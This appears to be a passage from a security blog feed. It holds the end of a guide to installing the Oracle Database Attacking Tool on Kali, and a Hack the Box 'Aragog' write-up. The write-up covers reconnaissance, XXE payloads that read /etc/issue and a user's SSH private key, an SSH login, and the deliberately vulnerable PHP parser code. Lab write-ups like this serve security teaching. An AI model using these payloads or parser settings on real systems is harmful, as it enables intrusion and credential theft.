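        echo "environment block for $dir already present in $rc"
        return 0
    fi
    # the backslash keeps $PATH literal, so it is expanded when .bashrc is sourced
    printf '%s\n' \
        "# oracle instantclient: $dir" \
        "export PATH=\$PATH:$dir" \
        "export SQLPATH=$dir" \
        "export TNS_ADMIN=$dir" \
        "export LD_LIBRARY_PATH=$dir" \
        "export ORACLE_HOME=$dir" | tee -a "$rc"
}

# Sanity check of the end state: the symlink resolves and the rc file carries the block.
check_setup() {
    dir="$1"; rc="$2"
    [ -f "$dir/libclntsh.so" ] || { echo "libclntsh.so missing or dangling in $dir"; return 1; }
    grep -qF "export LD_LIBRARY_PATH=$dir" "$rc" || { echo "environment block missing in $rc"; return 1; }
}

# Usage: setup_instantclient /opt/oracle ~/.bashrc   (then: source ~/.bashrc)
setup_instantclient() {
    base="$1"; rc="$2"
    dir="$(find_instantclient_dir "$base")" || {
        echo "no instantclient_* directory under $base; unzip the basic package first"
        return 1
    }
    link_clntsh "$dir" || return 1
    append_env "$dir" "$rc" || return 1
    check_setup "$dir" "$rc"
}
```

&lt;p&gt;Run &lt;code class=&quot;highlighter-rouge&quot;&gt;setup_instantclient /opt/oracle ~/.bashrc&lt;/code&gt; and then &lt;code class=&quot;highlighter-rouge&quot;&gt;source ~/.bashrc&lt;/code&gt;; the &lt;code class=&quot;highlighter-rouge&quot;&gt;sqlplus&lt;/code&gt; check above still applies afterwards.&lt;/p&gt;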

&lt;h3 id=&quot;installing-odat-development-version&quot;&gt;Installing ODAT (development version)&lt;/h3&gt;

&lt;p&gt;From this point forward it is basically the guide on the GitHub setup page minus a few steps. (I recommend running an &lt;code class=&quot;highlighter-rouge&quot;&gt;apt-get update&lt;/code&gt; before performing the following steps.)&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# cd /opt/
root@kali:/opt# git clone https://github.com/quentinhardy/odat.git
root@kali:/opt# cd odat/
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Install: &lt;em&gt;libaio1 python-dev alien python-pip python-scapy&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/odat# apt-get install -y libaio1 python-dev alien python-pip python-scapy
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Install: &lt;em&gt;cx_Oracle&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/odat# pip install cx_Oracle
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Test to make sure the dependencies so far have installed correctly. You shouldn’t have any errors here.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/odat# python -c 'import cx_Oracle'
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Install the following python packages from pip: &lt;em&gt;colorlog termcolor pycrypto passlib argcomplete&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/odat# pip install colorlog termcolor pycrypto passlib argcomplete 
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Activate python-argcomplete:&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/odat# activate-global-python-argcomplete
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;ODAT should now be fully functional. Good luck!&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/odat# ./odat.py -h
usage: odat.py [-h] [--version]
               {all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
               ...

            _  __   _  ___
           / \|  \ / \|_ _|
          ( o ) o ) o || |
           \_/|__/|_n_||_|
-------------------------------------------
  _        __           _           ___
 / \      |  \         / \         |_ _|
( o )       o )         o |         | |
 \_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------

By Quentin Hardy (quentin.hardy@bt.com or quentin.hardy@protonmail.com)

positional arguments:
  {all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}

                      Choose a main command
    all               to run all modules in order to know what it is possible to do
    tnscmd            to communicate with the TNS listener
    tnspoison         to exploit TNS poisoning attack
    sidguesser        to know valid SIDs
    passwordguesser   to know valid credentials
    utlhttp           to send HTTP requests or to scan ports
    httpuritype       to send HTTP requests or to scan ports
    utltcp            to scan ports
    ctxsys            to read files
    externaltable     to read files or to execute system commands/scripts
    dbmsxslprocessor  to upload files
    dbmsadvisor       to upload files
    utlfile           to download/upload/delete files
    dbmsscheduler     to execute system commands without a standard output
    java              to execute system commands
    passwordstealer   to get hashed Oracle passwords
    oradbg            to execute a bin or script
    dbmslob           to download files
    stealremotepwds   to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
    userlikepwd       to try each Oracle username stored in the DB like the corresponding pwd
    smb               to capture the SMB authentication
    privesc           to gain elevated access
    cve               to exploit a CVE
    search            to search in databases, tables and columns
    unwrapper         to unwrap PL/SQL source code (no for 9i version)
    clean             clean traces and logs

optional arguments:
  -h, --help          show this help message and exit
  --version           show program's version number and exit
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:/opt/odat# ./odat.py --version
Version 2.3 - 2018/06/03
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="tutorial" /><category term="pentest" /><category term="oracle" /><category term="tool" /><summary type="html">I decided to write a quick little guide on installing the Oracle Database Attacking Tool (ODAT) on the latest version of Kali Linux since I noticed people were running into issues with it. ODAT is an open source penetration testing tool targeted at attacking and auditing the security of Oracle Database servers.</summary></entry><entry><title type="html">Hack the Box - Aragog Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/07/21/hackthebox-aragog-writeup/" rel="alternate" type="text/html" title="Hack the Box - Aragog  Write up" /><published>2018-07-21T00:00:00-04:00</published><updated>2018-07-21T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/07/21/hackthebox-aragog-writeup</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/07/21/hackthebox-aragog-writeup/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/1.png&quot; alt=&quot;aragog&quot; /&gt;
&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://portswigger.net/&quot;&gt;BurpSuite&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/OJ/gobuster&quot;&gt;GoBuster&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/DominicBreuker/pspy&quot;&gt;Pspy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h2&gt;
&lt;h3 id=&quot;initial-scanning&quot;&gt;Initial Scanning&lt;/h3&gt;

&lt;p&gt;As with every Hack the Box machine, let’s begin with an nmap scan against aragog (10.10.10.78).&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# Nmap 7.70 scan initiated Sat May 12 19:49:54 2018 as: nmap -T4 -sC -A -n -v -p- -oA inital_scan 10.10.10.78
Increasing send delay for 10.10.10.78 from 0 to 5 due to 883 out of 2206 dropped probes since last increase.
Nmap scan report for 10.10.10.78
Host is up (0.14s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21 16:30 test.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.83
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=5/12%OT=21%CT=1%CU=40756%PV=Y%DS=2%DC=T%G=Y%TM=5AF7814
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 17.011 days (since Wed Apr 25 19:49:01 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   144.05 ms 10.10.14.1
2   144.26 ms 10.10.10.78

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 12 20:05:33 2018 -- 1 IP address (1 host up) scanned in 939.01 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;From our scan we can see three services to explore: FTP on port 21 with anonymous login enabled, SSH on port 22, and a web server on port 80.&lt;/p&gt;

&lt;h3 id=&quot;enumerating-ftp-testtxt&quot;&gt;Enumerating FTP (test.txt)&lt;/h3&gt;

&lt;p&gt;Let’s connect to the FTP server as the anonymous user.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/aragog# ftp 10.10.10.78
Connected to 10.10.10.78.
220 (vsFTPd 3.0.3)
Name (10.10.10.78:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&amp;gt; dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We see there is a single file called &lt;code class=&quot;highlighter-rouge&quot;&gt;test.txt&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;ftp&amp;gt; get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
86 bytes received in 0.00 secs (53.2220 kB/s)
ftp&amp;gt; quit
221 Goodbye.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Looking at the test.txt file we see some data related to a subnet_mask, which looks like XML-formatted data…&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/aragog# cat test.txt
&amp;lt;details&amp;gt;
    &amp;lt;subnet_mask&amp;gt;255.255.255.192&amp;lt;/subnet_mask&amp;gt;
    &amp;lt;test&amp;gt;&amp;lt;/test&amp;gt;
&amp;lt;/details&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;enumerating-port-80&quot;&gt;Enumerating Port 80&lt;/h3&gt;

&lt;p&gt;Upon visiting the server on port 80 you are shown the default Apache page.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/2.png&quot; alt=&quot;&amp;quot;Default Apache Page&amp;quot;&quot; title=&quot;Default Apache Page&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Running &lt;code class=&quot;highlighter-rouge&quot;&gt;gobuster&lt;/code&gt; against the site reveals that &lt;code class=&quot;highlighter-rouge&quot;&gt;hosts.php&lt;/code&gt; is available.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/aragog# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://10.10.10.78 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_aragog

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.78/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,403,200
[+] Extensions   : .php,.html
=====================================================
/index.html (Status: 200)
/hosts.php (Status: 200)
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Visiting &lt;code class=&quot;highlighter-rouge&quot;&gt;hosts.php&lt;/code&gt; you see the following landing page…&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/3.png&quot; alt=&quot;&amp;quot;Aargog hosts page &amp;quot;&quot; title=&quot;Aragog hosts page&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The page states that: &lt;code class=&quot;highlighter-rouge&quot;&gt;There are 4294967294 possible hosts for&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Looking backwards, let’s take a look at &lt;code class=&quot;highlighter-rouge&quot;&gt;test.txt&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;test.txt&lt;/code&gt; states that our subnet mask is &lt;code class=&quot;highlighter-rouge&quot;&gt;255.255.255.192&lt;/code&gt;. We attempt to do the calculation but realize that we can’t do subnet math in our heads! Oh my, we should have paid more attention in our intro to networking class in college! We quickly go back to school, rack up an additional 90,000 USD of student loan debt, and realize that &lt;code class=&quot;highlighter-rouge&quot;&gt;255.255.255.192&lt;/code&gt; is a /26, which has a maximum of 62 usable hosts per network with 4 possible networks available, which means (62 * 4) = 248 total possible hosts for the test.txt subnet.&lt;/p&gt;

&lt;p&gt;With our nearly complete accredited university education, we realize that &lt;code class=&quot;highlighter-rouge&quot;&gt;4294967294&lt;/code&gt; does not equal &lt;code class=&quot;highlighter-rouge&quot;&gt;248&lt;/code&gt;. With our newfound knowledge we attempt to send a &lt;code class=&quot;highlighter-rouge&quot;&gt;POST&lt;/code&gt; request with the data provided by &lt;code class=&quot;highlighter-rouge&quot;&gt;test.txt&lt;/code&gt; in the body of the request.&lt;/p&gt;

&lt;p&gt;We see the application react in the following manner…&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/4.png&quot; alt=&quot;&amp;quot;Subnet Calculation Arargon&amp;quot;&quot; title=&quot;Subnet Calculation Arargon&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Interesting, the application reacted just as expected. Let’s attempt a simple &lt;a href=&quot;https://hackingandcoffee.com/exploiting-xxe/&quot;&gt;XXE injection&lt;/a&gt;: the change in the response tells us the application is parsing our request body, and the data is likely XML.&lt;/p&gt;

&lt;p&gt;Our payload:&lt;/p&gt;
&lt;div class=&quot;language-xml highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&amp;gt;&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;&amp;lt;!DOCTYPE foo [  
&amp;lt;!ELEMENT foo ANY &amp;gt;&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;&amp;lt;!ENTITY xxe SYSTEM &quot;file:////etc/issue&quot; &amp;gt;&lt;/span&gt;]&amp;gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;details&amp;gt;&lt;/span&gt;

    &lt;span class=&quot;nt&quot;&gt;&amp;lt;subnet_mask&amp;gt;&lt;/span&gt;&lt;span class=&quot;ni&quot;&gt;&amp;amp;xxe;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;lt;/subnet_mask&amp;gt;&lt;/span&gt;

    &lt;span class=&quot;nt&quot;&gt;&amp;lt;test&amp;gt;&amp;lt;/test&amp;gt;&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;/details&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/5.png&quot; alt=&quot;&amp;quot;XXE reading /etc/issue&amp;quot;&quot; title=&quot;XXE reading /etc/issue&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Success.&lt;/p&gt;

&lt;h2 id=&quot;exploitation&quot;&gt;Exploitation&lt;/h2&gt;
&lt;h3 id=&quot;reading-florians-ssh-private-key&quot;&gt;Reading florian’s ssh private key&lt;/h3&gt;

&lt;p&gt;Since we are able to read files on the system, we can potentially read sensitive files on the box. By reading the contents of &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/passwd&lt;/code&gt; we know that &lt;code class=&quot;highlighter-rouge&quot;&gt;florian&lt;/code&gt; and &lt;code class=&quot;highlighter-rouge&quot;&gt;cliff&lt;/code&gt; are users on this box &amp;amp; their login shells are set to &lt;code class=&quot;highlighter-rouge&quot;&gt;/bin/bash&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/6.png&quot; alt=&quot;&amp;quot;Contents of /etc/passwd&amp;quot;&quot; title=&quot;Contents of /etc/passwd&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We attempt to read the &lt;code class=&quot;highlighter-rouge&quot;&gt;user.txt&lt;/code&gt; file for both users, and discover that florian is the user we are going after.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/7.png&quot; alt=&quot;&amp;quot;Florian user.txt&amp;quot;&quot; title=&quot;Florian user.txt&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We know that SSH is an available service on the box, so let’s see if florian has an SSH private key for his user.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;xml payload&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-xml highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&amp;gt;&lt;/span&gt;

&lt;span class=&quot;cp&quot;&gt;&amp;lt;!DOCTYPE foo [  
&amp;lt;!ELEMENT foo ANY &amp;gt;&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;&amp;lt;!ENTITY xxe SYSTEM &quot;file:////home/florian/.ssh/id_rsa&quot; &amp;gt;&lt;/span&gt;]&amp;gt;


&lt;span class=&quot;nt&quot;&gt;&amp;lt;details&amp;gt;&lt;/span&gt;

    &lt;span class=&quot;nt&quot;&gt;&amp;lt;subnet_mask&amp;gt;&lt;/span&gt;&lt;span class=&quot;ni&quot;&gt;&amp;amp;xxe;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;lt;/subnet_mask&amp;gt;&lt;/span&gt;

    &lt;span class=&quot;nt&quot;&gt;&amp;lt;test&amp;gt;&amp;lt;/test&amp;gt;&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;/details&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/8.png&quot; alt=&quot;&amp;quot;SSH Private key&amp;quot;&quot; title=&quot;Florian SSH Private Key&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Florian ssh_private key&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Let’s see if we can log in with the key.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/aragog# ssh -i florian_id_rsa florian@10.10.10.78
Last login: Sat Jul 21 05:52:00 2018 from 10.10.14.188
florian@aragog:~$ id
uid=1000(florian) gid=1000(florian) groups=1000(florian)
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Looks like the login was successful. Let’s take a quick peek at &lt;code class=&quot;highlighter-rouge&quot;&gt;hosts.php&lt;/code&gt;.&lt;/p&gt;

&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;florian@aragog:/var/www/html$ cat hosts.php
&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;

    &lt;span class=&quot;nb&quot;&gt;libxml_disable_entity_loader&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$xmlfile&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;file_get_contents&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'php://input'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$dom&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;DOMDocument&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;();&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$dom&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;loadXML&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$xmlfile&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;LIBXML_NOENT&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;LIBXML_DTDLOAD&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$details&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;simplexml_import_dom&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$dom&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$mask&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$details&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;subnet_mask&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;//echo &quot;\r\nYou have provided subnet $mask\r\n&quot;;
&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$max_bits&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'32'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$cidr&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;mask2cidr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$mask&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$bits&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$max_bits&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$cidr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$hosts&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;pow&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$bits&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\r\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;There are &quot;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$hosts&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot; possible hosts for &lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$mask&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\r\n\r\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;k&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;mask2cidr&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$mask&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;){&lt;/span&gt;
         &lt;span class=&quot;nv&quot;&gt;$long&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;ip2long&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$mask&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
